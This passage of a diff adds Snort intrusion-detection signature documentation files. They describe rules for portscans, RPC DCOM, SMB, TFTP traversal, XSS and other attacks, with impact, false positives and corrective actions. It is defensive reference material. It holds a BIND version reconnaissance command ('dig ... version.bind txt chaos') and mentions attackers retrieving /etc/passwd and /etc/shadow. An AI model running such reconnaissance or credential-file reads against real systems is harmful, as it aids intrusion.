+All hosts running the UNIX portmapper.
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where ttdbserverd runs.  This may be a precursor to accessing ttdbserverd.
+
+--
+Ease of Attack:
+Easy.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access ttdbserverd, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for ttdbserverd, not probes of the ttdbserverd service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the ttdbserverd service itself. An attacker may attempt to go directly to the ttdbserverd port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0717
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0003
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0687
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-1075
+
+
+--
--- /dev/null
+++ b/doc/signatures/121-4.txt
@@ -0,0 +1,98 @@
+
+
+Rule:
+
+--
+Sid:
+121-4
+
+--
+Summary:
+This event is generated when the pre-processor flow-portscan detects
+network traffic that may constitute an attack. Specifically a sliding
+scale talker limit exceeded event was generated.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the flow-portscan pre-processor detects
+network traffic that may consititute an attack.
+
+The flow-portscan pre-processor uses a flow based technique to identify
+portscanning in one-to-many and many-to-one scenarios based on flow
+creation in the flow pre-processor.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.flow-portscan in the docs directory
+of the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+detailed instructions and examples on how to tune and use the
+pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Chris Green <cmg@snort.org>
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
--- /dev/null
+++ b/doc/signatures/701.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+701
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft SQL.
+
+--
+Impact:
+Information gathering and data integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to an implementation of Microsoft SQL server or client.  This can
+lead to unauthorized access and possibly escalated privileges to that of 
+the administrator. Data stored on the machine can be compromised and 
+trust relationships between the victim server and other hosts can be 
+exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1540.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+1540
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a ColdFusion web server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Coldfusion. Many known vulnerabilities exist for this platform and 
+the attack scenarios are legion.
+
+--
+Affected Systems:
+	All systems running ColdFusion
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1141.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1141
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/946.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+946
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft FrontPage
+Server Extensions.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft FrontPage Server Extensions. Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft FrontPage Server Extensions
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1616.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+1616
+
+--
+Summary:
+This event is generated when an attempt is made to query version.bind on your DNS server.
+
+--
+Impact:
+Reconnaissance. This may indicate which version of BIND the server is running.
+
+--
+Detailed Information:
+An attacker can query a DNS server for the version of BIND running.  Some versions of BIND, by default, respond to these queries while BIND version 9; by default, does not.  A response to this query can assist an attacker in discovering servers that are potentially vulnerable to exploits associated with specific versions of BIND. 
+
+--
+Affected Systems:
+All versions of BIND.
+
+--
+Attack Scenarios:
+An attacker can execute this query to find DNS servers running specific versions of BIND.
+
+--
+Ease of Attack:
+Simple. Use the Unix command 'dig @ns.com version.bind txt chaos' 
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Remove the ability to retrieve the version.bind chaos record via configuration options.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Nessus:
+http://cgi.nessus.org/plugins/dump.php3?id=10028
+
+Arachnids::
+http://www.whitehats.com/info/IDS278
+
+--
--- /dev/null
+++ b/doc/signatures/2350.txt
@@ -0,0 +1,93 @@
+Rule:
+
+--
+Sid:
+2192
+
+--
+Summary:
+This rule no longer generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+This rule now uses flowbits and can be set to generate an event by
+modifying the rule slightly to remove the "flowbits:no_alert;" option.
+When traffic is detected that attempts to bind to the ISystemActivator
+object in MS RPC DCOM communications this rule now activates sids 2351
+and 2352 to detect exploits against this service. Cool huh?
+
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+This vulnerability is also exploited by the Billy/Blaster worm. The worm
+also uses the Trivial File Transfer Protocol (TFTP) to propagate. A 
+number of events generated by this rule may indicate worm activity.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists. This is also exploited by a worm.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+Block access to port 69 used by the worm to propogate.
+
+Block access to port 4444 used by the worm.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft:
+http://www.microsoft.com/technet/security/bulletin/MS03-026.asp
+
+CVE:
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0352
+
+Symantec:
+http://securityresponse.symantec.com/avcenter/venc/data/w32.blaster.worm.html
+
+--
--- /dev/null
+++ b/doc/signatures/1507.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1507
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2998.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid:
+2998
+
+--
+Summary:
+This event is generated when an attempt is made to shutdown a Windows
+system via SMB. 
+
+--
+Impact:
+Serious.
+
+--
+Detailed Information:
+This event indicates that an attempt was made to shutdown a Windows
+system via SMB across the network.
+
+It may be possible for an attacker to manipulate a Windows system
+from a remote location. Shutting down a system may lead to a Denial of
+Service for the target host.
+
+--
+Affected Systems:
+	Microsoft Windows systems.
+
+--
+Attack Scenarios:
+An attacker may be able to manipulate a target system using SMB. The
+attacker may gain complete control over the affected system.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of system compromise.
+
+Turn off file and print sharing on the target host.
+
+Use a packet filtering firewall to disallow SMB access to the host from
+sources external to the protected network.
+
+Disallow remote registry manipulation.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000668.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000668
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Harpia" application running on a webserver. 
+Access to the file "pheader.php" using a remote file being passed as the 
+"theme_root" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "theme_root" parameter in the "pheader.php" script used 
+by the "Harpia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Harpia
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000508.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+100000508
+--
+Summary:
+This event is generated when an attempt is made to access the file "wakka.php 
+which contains known vulnerabilities in the "Wikkawiki" application running on 
+a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to access a file with known 
+vulnerabilities from a remote machine used by the "Wikkawiki" application 
+running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Wikkawiki
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000557.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+100000557
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "VebiMiau" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "f_user" parameter in the "index.php" script 
+used by the "VebiMiau" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using VebiMiau
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/2174.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2176
+
+
+--
+Summary:
+This event is generated when an attempt is made to access a system
+file via SMB. 
+
+--
+Impact:
+Serious. This file contains important operating system information.
+
+--
+Detailed Information:
+This event indicates that an attempt was made to access a file
+containing important operating system information using SMB across the
+network.
+
+--
+Affected Systems:
+Microsoft Windows systems.
+
+--
+Attack Scenarios:
+If this file is accessible via SMB the attacker can manipulate the
+operating system registry settings.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of system compromise.
+
+Turn off file and print sharing on the target host.
+
+Use a packet filtering firewall to disallow SMB access to the host from
+sources external to the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+Microsoft Technet
+http://support.microsoft.com/support/kb/articles/q153/1/83.asp
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0562
+Winreg
+http://www.rutherfurd.net/python/winreg/
+
+
+--
--- /dev/null
+++ b/doc/signatures/1205.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1205
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2990.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+2990
+
+--
+Summary:
+This event is generated when an attempt is made to bind to the winreg
+service.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to bind to the RPC
+service for winreg.
+
+--
+Affected Systems:
+	Windows systems
+
+--
+Attack Scenarios:
+An attacker may attempt to bind to the service to manipulate host
+settings.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+Microsoft Technet
+http://support.microsoft.com/support/kb/articles/q153/1/83.asp
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0562
+Winreg
+http://www.rutherfurd.net/python/winreg/
+
+--
--- /dev/null
+++ b/doc/signatures/1896.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid: 1896
+
+--
+Summary:
+This event is generated when an attempt is made to exploit 
+vulnerable versions of the Kerberos version 4 administration daemon 
+(kadmind).
+
+--
+Impact:
+Serious. System compromize presenting the attacker with the opportunity to execute arbitrary code or gain unauthorized access to the target host along with other hosts in the kerberos realm.
+
+--
+Detailed Information:
+kadmind is used to administer a Kerberos database on the master key distribution center (KDC) of a kerberos realm.
+
+A buffer overflow condition exists in kadmind4 such that when the daemon parses a length value in an administration request the attacker can gain the ability to execute arbitrary code with the privileges of the user running the daemon, usually root.
+
+Authentication is not required to cause the overflow.
+
+Affected Systems:
+	Multiple vendors using kadmind version 4
+
+--
+Attack Scenarios:
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2002-29.html
+http://www.kb.cert.org/vuls/id/875073
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1235
+
+--
--- /dev/null
+++ b/doc/signatures/1778.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+1778
+
+--
+Summary:
+This event is generated when an attempt is made to cause a Denial of Service (DoS) to an FTP server.
+
+--
+Impact:
+Serious. Denial of Service.
+
+--
+Detailed Information:
+Certain versions of Microsoft's IIS FTP service are vulnerable to a DoS attack. The condition exists when a user attempts to view the transfer status using the STAT command. If the user enters a large number of file globbing characters as an argument, the service will crash.
+
+--
+Affected Systems:
+	Microsoft IIS versions 4.0, 5.0, and 5.1
+	Cisco Building Broadband Service Manager 4.0.1 - 5.1
+	Cisco Call Manager 3.0 - 3.2
+	Cisco Unity Server 2.0 - 2.4
+
+--
+Attack Scenarios:
+An attacker can cause the service to restart or hang, leaving the service unavailable to users.
+
+--
+Ease of Attack:
+Medium
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Josh Sakofsky
+
+-- 
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/4482
+
+--
--- /dev/null
+++ b/doc/signatures/282.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+
+282
+
+--
+Summary:
+This event is generated when an attempt is made to issue a Denial of 
+Service (DoS) attack against a host running Arkiea backup software.
+
+--
+Impact:
+Denial of Service
+
+--
+Detailed Information:
+
+Arkiea package is a backup application that is used to manage backups 
+for a number of systems. A Denial of Service (DoS) vulnerability
+exists in nlservd program, if fed with large inputs, will cause a 
+program to crash.
+
+A vulnerability in the nlservd from the Arkiea backup application allows
+remote users to shut it down by sending it large amounts of input over 
+the network.
+
+--
+Affected Systems:
+
+	Arkeia 4.0
+	Arkeia 4.1	
+
+--
+Attack Scenarios:
+
+An attacker sends a overly large strings to a nlservd daemon, the 
+service will crash immediately.
+
+--
+Ease of Attack:
+
+Simple.
+
+--
+False Positives:
+
+None known
+
+--
+False Negatives:
+
+None known
+
+--
+Corrective Action:
+ 
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Original Rule Writer Paul Bobby paul.bobby@lmco.com
+Snort documentation contributed by Nawapong Nakjang (tony@ksc.net, tonie@thai.com)
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/662
+
+--
--- /dev/null
+++ b/doc/signatures/3339.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3339
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/520.txt
@@ -0,0 +1,52 @@
+Rule:
+
+--
+Sid:
+520
+
+--
+Summary:
+This event is generated when a TFTP request is made with a directory designation of "/".  This may be an indication of an attempt to request or place files on the TFTP server outside the root directory configured for the TFTP server.
+
+--
+Impact:
+TFTP servers that allow files to be placed outside the configured root directory for the server may allow remote attackers to execute arbitrary commands on the system.  Additionally if the TFTP server allows directory transversal using the "/" designator it may be possible to retrieve files from other directories on the system.
+
+--
+Detailed Information:
+This rule searches for a "/" payload in TFTP requests.  Vulnerable TFTP servers may allow remote attackers to transfer files to directories outside the normal root directory configured for the TFTP server.  This could result in sensitive files being transfered off the system or arbitrary files being upload to the system.
+
+--
+Attack Scenarios:
+Using the "/" designator it may be possible to fool vulnerable TFTP server into placing files or retrieving files from outside the TFTP configured root directory.  Normally an attacker will attempt to retrieve sensitive system files such as "/etc/passwd" or "/etc/shadow" after determining if this attack vector is successful.  
+
+--
+Ease of Attack:
+Simple: Numerous tools and automated scripts exist for scanning large subnets for improperly configured TFTP servers.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives
+None Known
+
+--
+Corrective Action:
+Upgrade to the current version of your TFTP server solution, or contact the product vendor for patch information.
+
+Contributers:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski Matt.Watchinski@sourcefire.com
+
+Additional References
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0183
+
+Arachnids:
+http://www.whitehats.com/info/IDS138
+
+--
--- /dev/null
+++ b/doc/signatures/420.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+
+Sid:
